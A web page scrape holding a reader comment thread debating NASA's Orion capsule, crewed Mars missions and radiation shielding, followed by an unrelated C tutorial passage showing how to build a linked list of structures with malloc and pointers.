Consider: A span of just one hundred years between steam engines and telegraph communications to watching the first landing of men on the moon on our home television sets! Both were huge technological leaps. Neither were merely ‘stunts’. Only stunted perspectives could arrive at that conclusion.
Humans need new frontiers to daunt and intimidate us. We need that challenge to drive us ever forward, developing the new technologies essential for exploring new frontiers. Without these challenges, our race will devolve into increasingly trivial navel lint gazing exercises that sap the human spirit and leave the soul in despair. Look about you. It’s right in front of you. Look at the major cities through small towns that are infested with drugs, disease, and ideology driven human devolution. People without a frontier to conquer are rudderless, casting about for a ’cause’ to support, squabbling over resources, and slowly losing their humanity to anything that will temporarily ease their lack of purpose and despair of soul.
We should be better than this. We must be better, if the human race is to not merely survive but prosper and thrive! We need new frontiers….
We know what is on Mars. Engineers and scientists at JPL running rovers see it everyday in HD technicolor, and get to drill and sample Mars rocks and look at dirt under a microspcope and heat it for gas evolution study.
There is zero reason to send humans to that lethal environment to have them die slow agonizing deaths 100 million miles from Earth. No one on Earth could do anything but listen over the radio link as they slowly take their last gasping breaths with lungs filling with blood and fluid from chronic, lethal radiation poisoning.
Joel,
Re: “We know what is on Mars.”
We have traversed an exceedingly minute part of Mars with the exceedingly limited sampling/testing capabilities of our remote rovers. We have the barest glimpses of a minuscule bit of Mars, as a result. We know what is on Mars??? Talk about stunted perspectives!
Following that lilliputian leap of hubris, you argue with a sobbing emotional appeal the likes of PETA or WWF would be proud of. Pathetic.
Mankind is the an inquisitive and inventive species. We learned how to deal with the lethal environments of our home planet, not just surviving but thriving in the process. We will learn how to deal with the lethal environments off planet. A permanent return to the moon is the second toddling step we must take to learn, survive, and thrive ‘out there’.
It’s in our genes! It’s what we do!
J Mac,
You simply don’t understand the environment any humans would be dealing with once outside of Earth’ geomagnetosphere.
Lethal interplanatary space radiation environments are not in our “genes.” It is a radiation environment which we have zero years of adaptation. Apollo managed it with short duration missions, under 10 days.
Curiosity rover has been on Mars now almost 7 years, operating continuously with its RTG power source, not needing to stop for the winter like the earlier rovers running on solar PV.
It has almost 13 miles on its odometer. And its still going, exploring, measuring, drilling.
NASA’s Insight mission also currently underway on the surface just deployed the thermal “heat spike” sensor called the Mole. The Heat Flow and Physical Properties Package (HP3), aka the self-hammering mole is designed to dig down as much as 16 feet (5 meters) and take Mars’ temperature. Currently they are trying to get it to hammer dig its way through cohesive soil” that isn’t providing the friction needed for the bit to keep drilling. But they’ll figure it out.
Mar Opportunity Rover worked until last 10 Jun 2018, and had over 14 years navigating on the surface, and whopping total odometry of 28.06 miles!!
Its twin Spirit Rover, worked for 6 years, and an odometry of 4.8 miles in much more rugged terrain than Opportunity.
NASA JPL now has over 30 mobile rover-years on the surface of Mars under its belt, and over 45 miles of rover remote sensing. And that doesn’t count the stationary missions like Insight, Viking 1&2, and the Phoenix lander north polar mission.
But to put humans there:
Dealing with lethal radiation environments is done in some combination of 3 ways:
1. Sufficient Shielding,
2. Limiting exposure time, and lifetime limits.
3. Keeping the humans out entirely and using remote controlled devices.
RTG-powered Curiosity Rover is the ultimate example of #3. The human drivers sit safely in a Pasadena control room, sipping coffee in short sleeve shirt. Sending out long command sequences and 5 to 20 minutes typically for the video to come back of what the rover did.
Any humans on Mars surface will need to limit their time outside of the shelter due to radiation concerns, so spending many hours to walk or drive more than a few miles would be very risky for NASA to allow. And by the mid-2030’s when the mission might go, we’ll know a lot about Mars from the robotic missions. It is quite unlikely sending humans there would add anything objectively useful to understanding of Mars.
We could do 20-30 of these robotic missions and even a few sample return missions for the price tag of a single manned mission to Mars, if it can even be done. The money would be much better spent exploring the entire solar system with robotic missions for the cost of one manned Mars mission.
So going to Mars with people will not be about science. It will be about hubris, an emotion. That’s it. And the astronauts if they survive and return will likely be facing a seriously shortened life span due to steady irradiation of their heart and CNS by GCR relativistic particles.
Joel,
You simply don’t understand the human spirit. We will learn how to deal with the lethal environments off planet. A permanent return to the moon is the second toddling step we must take to learn, survive, and thrive ‘out there’. A manned Mars mission exceeds our current capabilities. ‘First you crawl. Then you walk. Finally, you learn to run.’ The moon, looming just beyond our ancestral cradle, is where we will learn to crawl and walk outside the protective geomagnetosphere of earth. It’s in our genes! It’s what we do!
As for your baseless assertion that I “simply don’t understand the environment any humans would be dealing with once outside of Earth’ geomagnetosphere.”, I’ll simply tell you you are wrong…. yet again. Ad hom attack – shame on you!
AMEN!
Until and unless we solve the problems with radiation exposure, there is no real reason to send humans beyond the moon. We should be working on next generation robots instead.
The rocket is useful – we can send robot explorers further and faster (and heavier), bu the capsule is a waste of time and money. The orbiting space station is mostly a waste of money. It is so much cheaper to send machines in place of humans.
You can solve the gravity problem, just build a fat enough circular crew quarters and spin it. You can grow food, produce oxygen, recycle wastes and water. What we can’t do as yet is bring down radiation levels to an acceptable risk for long term space travel – until you solve that problem the rest is useless beyond the Moon.
It will require (at least) two things – thick shielding likely made of multiple layers of stuff, including ice-water, and a powerful magnetic field around the ship to try and redirect a lot of the particle radiation.
Another breakthrough would be to put people into a controllable coma for the trip, and seal them into a highly shielded room. Yep, they would be cooking when awake and outside the room, but the majority of the travel would be in the shielded room.
So yes, the capsule looks cool. But it isn’t really getting us closer to planetary travel, at least not safely.
Yes deep space radiation is an issue. So are all of the other items you listed. We currently cannot keep even an Earthbound eco-habitat operational, let alone one that doesn’t have gravity to keep things in place.
Artificial gravity from rotation leaves a lot to be yet resolved as well. The huge radial distances are needed to keep the rotational speeds low. With smaller structures you need very high rotational speeds and that leads to non-uniform gravity gradients measureable over the scale of the human body. When standing the gravity at your head would be less than at your feet (think amusement park ride inducing nausea) and the trajectory of falling object will be an arc.
As to radiation surrounding the crew quarters with about 18″ of water and polyethylene tanks will suffice to stop deep space radiation.
18″ water shielding = 500 kg/square meter (0.5 metric tonne) shielding. Crew and living quarters, assume 2 independent living space spheres 4 meters in diameter = 2 x 50 sq meters = 100 sm surface area.
100sm x 0.5 mt/sm – 50 tonnes of just the water shielding.
That’s 50 tonnes additional mass that would have to be accelerated out of low-Earth orbit on a Mars intercept, then decelerated on Mars arrival, and then accelerated again for the trip home.
You clearly have no idea how much chemical fuel for the thrust that would take just for the shielding.
And BTW, most radiation studies put the shielding necessary at around 1 full meter of water, or 1 mt/sm. So double your guess of 18″.
The water is the fuel too as Hydrogen/Oxygen. We just have to get extra water to space for the radiation protection, which I am surprised by now we are not blasting out ice bullets on chemical/electric rail guns out of a mountain tunnel bear the equator for cheap. Hitler had started building his proposed V-3 cannon which was really just a 150 mm 175 foot long long gun barrel with staged firing of accelerant. They were capable of firing shells up to 80 miles away and would have been pounding London from France with them if the war hadn’t ended sooner. A Canadian was also developing this for Saddam in Iraq when it was believed the Israeli’s assassinated him. This tech would be great for blasting out ice bullets or steel/aluminium ingots to space/orbit. Just don’t let the Gov’t do it or it will cost 10x as much.
Earthling2
July 3, 2019 at 7:56 pm
Yes, McGill University in Montreal was involved with this when I was there in the 1960’s. called Project Martlet (or something similar). It used a huge gun (possibly ex Nazi WWII) operting in Barbados to get the equatorial orbital boost. I think they fired at least one shot and the gun is still there rusting away. It might have been very useful to get water into orbit.
“That’s 50 tonnes additional mass that would have to be accelerated out of low-Earth orbit on a Mars intercept, then decelerated on Mars arrival, and then accelerated again for the trip home.”
Or we could use Buzz Aldrin’s Mars Cycler design for travel between Earth and Mars. The Mars cycler is put into an orbit that intercepts both the Earth and Mars. Once put on this trafectory, the cycler will stay in this orbit without further need for large amounts of propellants.
As the Mars Cycler approaches Earth orbit, an orbital transfer vehicle meets it and transfers crews and equipment back and forth. Once the Mars Cycler reaches Mars orbit another orbital transfer vehicle will meet it and transfer the crew and equipment to where the Mars base is located.
If we wanted artificial gavity on the trip to and from Mars, then we would use two habitat modules for our Mars Cycler separated by a mile-long cable and the modules would orbit the center at a speed of one revolution per minute and this would produce artificial gravity (centrifugal force) in the habitation modules equivalent to the gravity on the surface of the Earth.
That configuration ought to cut down on propellant use between Earth and Mars and would keep people safe from space radiation and would keep their bodies from deteriorating due to exposure to microgravity for long periods of time.
“Until and unless we solve the problems with radiation exposure, there is no real reason to send humans beyond the moon.”
Ths solution is to use water ice as a radiation shield. A one-meter-thick coating of water ice on the outside of a habitat module will keep people inside safe from space radiation.
We are talking additional weight here with using water ice, but that’s manageable.
I flatly do not believe there is any economic justification for sending a human to Mars. The notion we are going to start living there is a propaganda dream designed to separate taxpayers from their hard earned income.
This does not mean I see no value in space exploration. In fact, I believe the exact opposite. We should move the money to robotic exploration. This will allow far greater diversity in our efforts. How many moons are there begging to be studied right now? Who cares if there may have been life on Mars. There may be life elsewhere right now. Let’s go look. Let’s also build telescopes. I love telescopes.
To the folks who say only a human can properly explore, I ask what about all the claims of Ai and deep learning? Or is that all just a bunch of BS too?
Robert, why send robots at all? Since we are never going to go why should we care what is out there?
/sarc
Harvesting asteroids for metals to return to Earth though is another story. No deep gravity well to deal with for retrieval. Robotics with nuclear powered ion-propulsion would be ideal to mine those, then use gravity-assist decelerations passes on Mars, Earth, and Venus to bring them back to 1 AU. Using robots you could take your time, like decades long asteroid mining missions.
Unless there is a really big need for scarce materials on earth the best use of the materials we harvest (mine?) from space will be to keep them in space to manufacture things there. Don’t send them down the gravity well to Earth only to need to lift them back up again.
Many years ago there was a movie about a mission to an asteroid made of pure sapphire. Even then I asked “Don’t we have sapphires on Earth?” The cost to return the gems to Earth would be more than the gems were worth on Earth. Most materials are worth more in space, where they are needed.
+10!
Robert Goldman
July 3, 2019 at 11:29 am
The justification is that we need to have a plan B in case an asteroid or comet is coming our way that we can’t deflect. There could be a nuclear war wiping us all out on the Earth.
If we have a breeding colony of humans on Mars at least the species will survive unlike the dinosaurs. In any case the technology spinoffs will be immense, not to mention the inspiration to our youth. We all need goals; the loftier the better.
Mars is a truly inhospitable place. Atmosphere 99.4 % of the way to full vacuum. Like the moon program, a new generation of people in-the-know has forgotten the irrationality of the idea of space colonization as presently conceived, and won’t ‘get it’ until they see how much of GDP various people have spent on it so they can be public heroes.
Moon: A gazillion dollars to see some grey dust, with nothing in it.
Mars: A gazillion bazillion dollars to see some red dust, with nothing in it.
Return on investment: Minus gajllion.
Practical use: a few photos, and some grey and red dust (which Nasa will manage to lose some of, believe it or not).
Danger factor: severely high.
Not all expeditions have the same practical value. Just ask any oil or mineral geologist.
It’s interesting how superficial people are, isn’t it? The Moon *looks* like grey dust, it doesn’t even *look* as Earth like as Mars does in photos, so therefore “grey dust” is all there is to the Moon, obviously, look there, just a whole continent sized object made of grey dust!
In reality, while it’s clearly pretty useless to think of going all the way to the Moon just for materials we can get far more practically here on Earth, there *is*quite a lot more to the Moon than meets the eye! Besides potentially mineable iron content, say, there is also quite good evidence for mineable water at the lunar poles, and likely other volatiles (nitrogen compounds, say, as well).
All good stuff, *if* you think there is some sort of future for ‘in space’ industry, maybe a market for lunar derived rocket fuels for boosting satellites around, say?
You’ve obviously never done any mining.
I suppose I could always try to prove my great expertise to you by flying to the Moon tomorrow, so as to try to pan some water nuggets out of the bottom of Shackleton crater — or something.
Is that the kind of thing you had in mind?
Seriously, the Moon is a lot different than the Earth, there is no point at all in trying to drill a water well, say, and, any serious technology for extracting anything useful is going to be different than most of what we do here. Further, I see no guarantee that space industry will ever be big enough to really benefit from mining the moon, asteroids, etc. — *but*, something like that *may* happen eventually (space industry using ET materials, I mean).
(Hopefully the above caution is enough to cover the fact that I am off to the Moon tomorrow to get back to my regular job processing Lunar thorium for the Arcturians –
— Heigh Ho!). Then we are all going to have to learn Mandarin and how to eat with chop sticks, just like if the German Nazis had won WW2 we would all be speaking German now.
Seeing how the Chinese treat other people, including themselves and the way they trash the environment and other countries EEZ such as their 7 artificial island military bases in the West Philippine Sea (South China Sea), I am all for our civilization to take over outer space and ensure those barbarians are nowhere near the gates of outer space. Deny them entry to space if we have to, and I don’t care what it costs to ensure evil doesn’t take over the world. We are so lucky to have President Trump on that file, but even he may be too weak to arrest this long term menace that human kind faces. Whomever rules space long term will rule the Earth. And I for one would much rather it be a western alliance, than a red menace. This is really only the tip of the iceberg that this trade war is about.
I live overlooking Subic Bay, so I am delighted to read someone correctly naming the bit of ocean out my window – The West Philippine Sea. You can but t-shirts here with that printed on the front.
.”
The Chinese have set themselves the goal of building a working Solar Power Satellite in orbit by the year 2030.
As far as I know, NASA is doing little or nothing with regard to solar power satellites. I guess we can buy our power in orbit from the Chinese. If they will sell it to us.
NASA needs to build a demonstration Solar Power Satellite, preferably before the Chinese do, and NASA needs to build an Orbital Transfer Vehicle that is capable of operating in orbits between the Earth and the Moon. Basic space development infrastructure. NASA needs to get busy developing the things humans will need to operate and do business in space.
Trump has taken the first step by declaring the U.S. is going back to the Moon.
Here is an idea for a NASA Solar Power Satellite:
NASA should get themselves a large balloon and cover the outside of the balloon with solar panels in a manner that allows the ballon to be folded up for launch. Thin-film solar cells might be a good choice for this kind of setup.
NASA can launch the balloon into an appropriate orbit and could use a few pounds of helium to inflate the balloon to full size, and then the U.S. will have a working Solar Power Satellite. There won’t be any need to aim this SPS at the Sun because half of it will always be illuminated no matter which way it turns.
That shouldn’t be that difficult to do. I haven’t kept up with developments in the thin-film solar cell area but my understanding is they have been improved over the years. And I suppose a clever person might be able to figure out how to attach conventional solar cells to the outside if that were necessary.
I just like the simplicity of this design.
There are a lot of space entreprenuers down on Earth thinking about how they can power the projects they have planned for orbit. I bet they would like to have an option to tap into a Solar Power Satellite.
A Solar Power Satellite could also be used to power vehicles and allow them to move around the Earth/Moon system. And if the Solar Power Satellite is big enough, it can be used to deflect dangerous asteriods
I read the other day where a study was done about using nuclear weapons to deflect an asteriod and the study found that even if the nuclear weapons broke the asteriod apart, the gravity of the asteriod would quickly reassemble the pieces, so a Solar Power Satellite may be our best bet at planetary defense.
NASA should get busy developing this technology.
Abbott: “develop this technology.”
..
Geez. buddy, there are already dozens of solar power satellites in geosynchronous orbit send beams of microwave energy down to earth powering people’s television sets.
…
Here is a picture of what people put on their roofs to collect this power: />
…
Seems like you are trying to re-invent the wheel.
Solar power beamed down from geosynchronous orbit does have the nice feature in principle that the power beamed down can be almost full time. Not so much need, then, for attaching super sized battery clusters, which is one of the “fails” for ground situated solar cells.
Unfortunately, the whole prospect of converting to microwaves, beaming inefficiencies, the sheer cost initially of operating in space, etc., all of that *still* doesn’t seem too encouraging for the near future economics of power satellites! If, as I think, Global Warming isn’t much of a problem, why not just frack some natural gas, burn it for power — why even think of going for a more expensive space based idea?
Here is a thought, what about just putting really big mirrors in geosynchronous orbit, or attached to quite long, free flying, “skyhook” cables that orbit earth synchronously? Make the mirrors big enough and you don’t have to be concerned with converting to microwaves in space (then reconverting to electrical power from the microwaves, etc). Just send light down where needed, say for urban nighttime lighting — or for saving crops in the fall in rural areas, where said crops are in danger of premature freezing in autumn. Also, what about all those poor ground based solar cells, stuck in the dark overnight? Our space based mirrors, or “solettas” could help keep ground based solar powered up as well?
Anyway, this is just a thought, as I’ve no doubt there would be some kind of advanced engineering needed, to say the least, to build space mirrors as light in mass as possible, and still give them the required structural soundness, controlability, etc.
Earthling2,
Strategic thinking, in a comments list with very little of that. Nice!
Good. Now put it on top of Falcon Heavy and let’s go. Cancel the booster for SLS. Costs $500 million per launch versus Falcon Heavy $100M. NASA is just a jobs program for NASA and Boeing. And when Spacex debugs Dragon then retire Orion.
sky king
July 3, 2019 at 8:59 pm
Totally agree. However, why not retire Orion now as well as SLS, give some of the money to Musk and let him get on with Falcon Heavy and maybe BFR. To be fair maybe give some of the money to Bezos as well.
All the above commenters are right.
There is no good reason to explore space, no need for such technology.
We will just huddle here at the bottom of this gravity well and wait for the asteroid to come to us.
Well sarc off.
I thought Orion was the tag reserved for the Nuclear Bomb powered rocket.
J Mac @9:42 am says it best.
We need a challenge.
As to the hard radiation problem,one stop gap would be to send Old men.
We have the skills and are well past our best before breeding days and reduced gravity would be a boon.
Those who worry about lives lost and explosive failures..bet you drive on the freeway without a thought.
The one certain thing about life,is that it will kill you.
And as long as we huddle down here in the dirt,we know an asteroid will come, just not when and currently there is nothing we can do about it.
Funny how the Cult of Calamitous Climate can get so worked up over a weak conjecture concerning a trace gas,yet a real climate shattering,humankind extinquishing event like an asteroid.. Never mind.
Orion Project success!!!??? Nuclear propulsion!?
Oh… that… Well, that’s nice…. whatever…
By the time the Orion project makes it to the moon, colonists put there by Spacex will be waving as the craft descends.
Ernest Bush
July 4, 2019 at 10:09 am
Yes, along with their Chinese ?comrades. Only I doubt they will be waving.
It’s odd that NASA is re-using the old ‘Orion’ name. The original Project Orion was a 1950’s idea for a spacecraft which used NUCLEAR BOMBS as fuel (). The idea being to build the spacecraft on top of a massive plate, with shock absorbers. Then set off a controlled (yeah, right) series of nuclear bombs under the plate. Larry Niven’s SF novel ‘Footfall’ used a clandestinely built ‘Orion’ to get into orbit and overcome an alien invasion. There was apparently a lot of work done on small nuclear bombs for this, and it’s all still classified. | https://wattsupwiththat.com/2019/07/03/successful-orion-test-brings-nasa-closer-to-moon-mars-missions/ | CC-MAIN-2022-05 | refinedweb | 10,152 | 70.94 |
Function
Displays an image in an X window.
Syntax
#include <dx/dx.h>
Object DXDisplayX(Object i, char *xdisplay, char *title)
Object DXDisplayX8(Object i, char *xdisplay, char *title)
Object DXDisplayX12(Object i, char *xdisplay, char *title)
Object DXDisplayX24(Object i, char *xdisplay, char *title)
Functional Details
Displays image i in an X window on the display specified by xdisplay, with the title specified by title. xdisplay is used as the X display string when opening the window. The window associated with xdisplay is maintained for subsequent calls to DXDisplayX until the user closes it, after which a new window is created.
These routines can utilize 8-bit pseudo color X visuals, 12-bit Direct Color and True Color visuals, and 24-bit Direct Color or True Color visuals.
DXDisplayX tries to create a window with the default visual, and if it is not of an appropriate type, tries to create an 8-bit, then 12-bit, then 24-bit visual. The other routines try to create the appropriate depth window first (for example, DXDisplayX8 tries to create an 8-bit window, then tries the default window depth.
Return Value
Returns i or returns NULL and sets an error code.
See Also
DXMakeImage
16.9 , "Image Fields".
[Data Explorer Home Page | Contact Data Explorer | Same document on Data Explorer Home Page ] | http://www.cc.gatech.edu/scivis/dx/pages/progu134.htm#HDRDXDXS | crawl-003 | refinedweb | 221 | 53.92 |
Sencha Touch BDD
tl;dr
A multi-part series of articles on how to test Sencha Touch applications. It uses Jasmine for unit testing and Siesta for integration testing.
Part 1 – Getting Started
In this article you will learn how to set up an application to Jasmine tests in your
Opinionated is a good thing
In my not-so-humble professional opinion, every modern web framework should provide a testing infrastructure with each newly generated application. I’m not concerned if it isn’t my preferred testing package. As long as there’s something. Testing is not an option, and the framework authors probably (hopefully?) test, so why not offer a serving suggestion for new projects? The worst that can happen is that you, the developer, disagree with the choice of framework. There’s a little extra bootstrap cost to replace one framework with another. That’s far less expensive than every new developer discovering a way to test.
Sencha Touch 2.1 has a generator built into its
sencha command line tool, but it does not create a test structure as part of the template. This article is the first in a series of discoveries about how to test Sencha Touch applications. I am not claiming that this is the one true way to test. This is not necessarily the best way, either. It is, however, something that works. It installs easily on my development laptop. It gets you to your first passing test quickly. It saves you the cost of exploring all of the options and making these discoveries for yourself. You have plenty of other things to worry about.
But first, you need a web server
Once you’ve installed Sencha Touch and Sencha Command (3.1.0.256 when I wrote this), and you’ve generated the template application, you’ll need to serve the pages locally. Most projects will have some sort of app server already running, but it’s not strictly necessary for testing. When I need to serve pages on my own, I prefer pow. It is a zero-configuration server that can host as many applications as you please. I also like the powder ruby gem; it adds a nice command line interface to manage
pow. If you are worried about adding a ruby dependency to your project, stop worrying. Sencha Touch uses the compass ruby gem to generate
css files; so you already have a ruby dependency.
pow looks for a rack app, but in my sample app, I don’t have one.
pow also looks for a directory named
public from which it will server static files. The simplest thing that works is to create a symlink named
public that points to the root directory of the project.
# Generate a new ST app $ cd <touch toolkit directory> $ sencha generate app senchaBdd ~/workspace/sencha-bdd # Set up pow/powder $ cd ~/workspace/sencha-bdd $ ln -s . public $ powder up $ powder link # Test the server $ open
If all goes well, you should be able to open the application in any web browser at
Install Jasmine
Installing the stand-alone version of Jasmine will work, but it doesn’t scale to hundreds or thousands of specs. That’s why the Jasmine gem was created. I did some more research and found a way to test using the Jasmine gem.
- In the root directory of your project add
rakeand
jasmineto your
Gemfile
$ cat Gemfile source "" group :development do gem 'rake' gem 'jasmine' end
Run
bundle install
Run
jasmine init
- Jasmine will install a basic set up, but there’s some cruft that you won’t need for a Sencha application.
rm public/javascripts/Player.js rm public/javascripts/Song.js rm spec/javascripts/PlayerSpec.js
- Edit the src_files entry in
spec/javascripts/support/jasmine.yml:
src_files: - touch/sencha-touch-all-debug.js # Load Sencha library - spec/app.js # Load our spec Ext.Application - app/**/*.js # Load source files
- Create this file in
spec/app.js:
Ext.Loader.setConfig({ enabled: true, // Turn on Ext.Loader disableCaching: false // Turn OFF cache BUSTING }); Ext.Loader.setPath({ 'SenchaBdd': 'app' // Set the path for all SenchaBdd.* classes }); Ext.application({ name: 'SenchaBdd' // Create (but don't launch) an application });
- And this one in
spec/javascripts/helpers/SpecHelper.js:
Ext.require('Ext.data.Model'); afterEach(function () { Ext.data.Model.cache = {}; // Clear any cached models }); var domEl; beforeEach(function () { // Reset the div with a new one. domEl = document.createElement('div'); domEl.setAttribute('id', 'jasmine_content'); var oldEl = document.getElementById('jasmine_content'); oldEl.parentNode.replaceChild(domEl, oldEl); }); afterEach(function () { // Make the test runner look pretty domEl.setAttribute('style', 'display:none;'); });
So, what’s going on here? Sencha Touch applications need Ext.Loader to manage class loading. You also need an Ext.Application, especially for controller tests. The modifications to
jasmine.yml set up the proper load order, and the jasmine gem will find all of the source files underneath the app/ directory. The
app.js is a customized version of your normal
app.js that sets up the class loader and global namespace configuration. You should replace “SenchaBdd” with the real name of your application. Two things are happening in
SpecHelper.js: First, by default Ext.data.Model caches every model created by the application in a global in-memory array. If you don’t clear it between tests, you can be surprised by test pollution. The second part is to set up and clear a space in the test runner for inserting DOM elements, usually for some sort of view testing.
Create a directory structure that matches your application’s
Your application’s directory structure should look something like this:
├── app │ ├── controller │ ├── model │ ├── profile │ ├── store │ └── view
Modify the spec directory so that it mirrors the
app/ directory:
├── spec │ ├── app.js │ └── javascripts │ ├── model │ ├── controller │ ├── view │ ├── store │ ├── profile
Install Jasmine
You can get the stand alone version from. Install it at the in the spec directory. I include the version number, so I can experiment with different versions, but that’s a matter of taste.
├── app │ ├── controller │ ├── model │ ├── profile │ ├── store │ └── view ├── public -> . ├── resources/ ├── spec/ │ ├── controller │ ├── jasmine-1.3.1 │ ├── model │ ├── profile │ ├── store │ └── view └── touch
In order to get Jasmine going, you need a special html file named, by convention,
SpecRunner. Add it to spec/ as well. It looks like this:
You will need to modify lines 18 and 22 with the name of your ST app (which can be found in
app.json and
app.js).
Write one passing test
Create a file,
spec/javascripts/sanitySpec.js
describe("Sanity", function() { it("succeeds", function() { expect(true).toEqual(true); }); });
Now load the spec runner into a browser. In the case of this sample app, the url is
Now start the Jasmine spec server from the command line:
bundle exec rake jasmine
And then open a browser window on
You should see the test results with one passing spec.
If you don’t see this, open up the browser’s developer console to look for clues.
Until next time
That’s it! You now have a complete JavaScript testing framework installed in your application. This is a good time to commit your changes. Celebrate in the glory of the green goodness. You’ve earned it.
Next time, I’ll show you how to test a model class.
Working in the same office as the authors (of Jasmine in this case) has its benefits. Apparently, I’m doing it all wrong. You can and should use the jasmine gem, which can load all of your source and library code into a stand alone web server. I’ll post a revision this week with the details.
April 21, 2013 at 12:07 pm
Pingback: Links for April 19th through April 26th
Fantastic article, even managed to follow it on Windows.
Two comments for other newbies like me…
1) Step 5 of ‘Install Jasmine’, “Ext.Application” is part of the comment on the row above DON’T enter it on a new line it breaks,
and you get a really useful error
rake aborted!
(): could not find expected ‘:’ while scanning a simple key
2) It’s worth doing the “bundle exec rake jasmine” just after the “jasmine init” to check it’s all hanging together. I didn’t and couldn’t then tell if it was something I done wrong in the files (see 1) or a bad installation/missing components.
Now for Parts 2-5
July 12, 2013 at 8:00 am
How does one install the Jasmine gem on Windows? Or baring that (since I only have, and will only ever have, a single application) what does the SpecRunner.html file look like?
August 1, 2013 at 3:08 pm
It’s just a ruby gem, so if you can get a rack app running, then jasmine will run, too.
August 2, 2013 at 10:10 am
I found I needed to first install bundler before running ‘bundle install’ …
$ gem install bundler
September 18, 2013 at 8:07 pm | http://pivotallabs.com/sencha-touch-bdd-part-1/?tag=bloggerdome | CC-MAIN-2015-14 | refinedweb | 1,488 | 66.33 |
Building a Simple EJB Application Tutorial
Building a Simple EJB Application - A Tutorial
.... This application, while simple, provides a good introduction to EJB
development and some... in
and
XDoclet.
This application, while
simple, provides a good
ejb - EJB
:
Hope...ejb how can i run a simple ejb hello application.please give me
EJB - EJB
EJB Dear Sir ,
Which book is good for learning EJB .
THANKS AND REGARDS,
SENTHILKUMAR.P
EJB Project
EJB Project How to create Enterprise Application project with EJB module in Eclipse Galileo?
Please visit the following link:
EJB 3.0 Tutorials
Building a Simple EJB Application ?A Tutorial .... This application, while simple, provides a good introduction to EJB development...
Simple JNDI lookup of EJB
Annotations
To make
ow to create EJB in eclipse and deploy in tomcat EJB ? - EJB
/ejbtutorial/building_a_simple_ejb_application.shtml to create EJB in eclipse and deploy in tomcat EJB ? Hi All,
Although i know the concept of EJB , but I have never got a chance to work
EJB Books
concepts, showing you both the good and bad in building real-world EJB... business objects in any J2EE application.
Professional EJB shows how..., JDO,
iBatis-and EJB 3. It discusses the patterns of good lightweight
first entity bean example in eclipse europa - EJB
:
http... to create simple ejb3.0 application in eclipse .And also how to create entity bean
ejb
ejb why
ejb components are invisible components.justify that ejb components are invisible
ejb
ejb what is ejb
ejb is entity java bean
EJB 3.0 Tutorials: Learn EJB 3.0 with Simple Examples
EJB 3.0 Tutorials: Learn EJB 3.0 with Simple Examples
Enterprise JavaBeans... of simple examples integrated with codes.
So, begin with Roseindia.net EJB 3.0...
Application Server
EJB Container or EJB Server
Enterprise Beans
Features of EJB 3.0 with EJB 3
Java with EJB 3
Position Vacant:
Java with EJB 3
Job Description ... will be writing code, test cases and documentation of the project. You must be good... the application once and then deploy on any one of the JEE 5 complaint application plz send me the process of running a cmp with a web application send me an example
EJB - EJB
Hi good afternoon
Hi good afternoon write a java program that Implement an array ADT with following operations: - a. Insert b. Delete c. Number of elements d. Display all elements e. Is Empty
EJB-MDB - EJB
EJB-MDB What are the MDB transaction attributes
HOW TO BECOME A GOOD PROGRAMMER
HOW TO BECOME A GOOD PROGRAMMER I want to know how to become good programmer
Hi Friend,
Please go through the following link:
CoreJava Tutorials
Here you will get lot of examples with illustration where you can....
* Managing the fast growing number of users requires distributed application2ee - EJB
java - EJB
java hi friends,
i am creating one file, i want to store this file in my working directory.how can i get real path or working directory path in ejb?
regards,
srinivas
EntityBean - EJB
with storing and retrieving of application data, can now be programmed with Java Persistence API starting from EJB 3.0.
Read for more information.
Swing EJB
would work with EJB application server...Swing EJB Hi everyone !!!
I tried to find wether EJB architecture can operate
with swing, because I am trying to make application
which would work
????
NullPointerException - EJB
] at java.lang.Thread.run(Thread.java:595)
PLEASE HELP..... I am new to ejb and jboss
EJB3 - stateless - EJB
EJB stateless session bean Hi, I am looking for an example of EJB 3.0 stateless session bean
RUNNING EJB PROGRAMS
RUNNING EJB PROGRAMS how to run ejb programs using weblogic in windowsxp Interfaces
EJB Interfaces
Interface in java means a group of related methods with empty bodies.
EJB have generally 4... for creating Remote interface.
package ejb;
import
my question - EJB
my question is it possiable to create web application using java beans & EJB's with out implementing Servlets and jsps in that java beans and EJB's
EJB,java beans
EJB,java beans What is EJB poles,mainfest,jar files?
What is nongraphical bean?
Please send me as notes
EJB interceptors Demo
EJB interceptors Demo Please give me a detailed description and the demo for developing the interceptors in EJB. If possible give me a videos
EJB JNDI LOOK UP PROBLEM - EJB
EJB JNDI LOOK UP PROBLEM Hi,
I am using jboss4.2 and created...://
Hope that it will be helpful for you | http://www.roseindia.net/tutorialhelp/comment/92041 | CC-MAIN-2013-48 | refinedweb | 742 | 58.69 |
How to Create a Linked List in C Programming
In C programming, if you want to add a second structure to code you’ve already created, create a linked list — a series of structures that contain pointers to each other. Along with the basic data in a structure, the structure contains a pointer, which contains the address of the next structure in the list.
With some clever juggling of pointer names, plus a NULL to cap the end of the list, you might end up with something similar to the source code in A Primitive Linked-List Example.
A PRIMITIVE LINKED-LIST EXAMPLE
#include <stdio.h> #include <stdlib.h> #include <string.h> int main() { struct stock { char symbol[5]; int quantity; float price; struct stock *next; }; struct stock *first; struct stock *current; struct stock *new; /* Create structure in memory */ first=(struct stock *)malloc(sizeof(struct stock)); if(first==NULL) { puts("Some kind of malloc() error"); exit(1); } /* Assign structure data */ current=first; strcpy(current->symbol,"GOOG"); current->quantity=100; current->price=801.19; current->next=NULL; new=(struct stock *)malloc(sizeof(struct stock)); if(new==NULL) { puts("Another malloc() error"); exit(1); } current->next=new; current=new; strcpy(current->symbol,"MSFT"); current->quantity=100; current->price=28.77; current->next=NULL; /* Display database */ puts("Investment Portfolio"); printf("SymboltSharestPricetValuen"); current=first; printf("%-6st%5dt%.2ft%.2fn", current->symbol, current->quantity, current->price, current->quantity*current->price); current=current->next; printf("%-6st%5dt%.2ft%.2fn", current->symbol, current->quantity, current->price, current->quantity*current->price); return(0); }
This source code is pretty long, but it simply creates a second structure, linked to the first one. Don’t let the source code’s length intimidate you.
Lines 13 through 15 declare the standard three structure pointers that are required for a linked-list dance. Traditionally, they’re named first, current, and new. They play into the fourth member in the structure, next, found at Line 11, which is a structure pointer.
Don’t use typedef to define a new structure variable when creating a linked list. A Primitive Linked-List Example doesn’t use typedef, so it’s not an issue with the code, but many C programmers use typedef with structures. Be careful!
The variable name new, used in Line 15, is a reserved word in C++, so if you want to be bilingual, change the variable name to new_struct or to something other than the word new.
When the first structure is filled, Line 30 assigns a NULL pointer to the next element. That NULL value caps the end of the linked list.
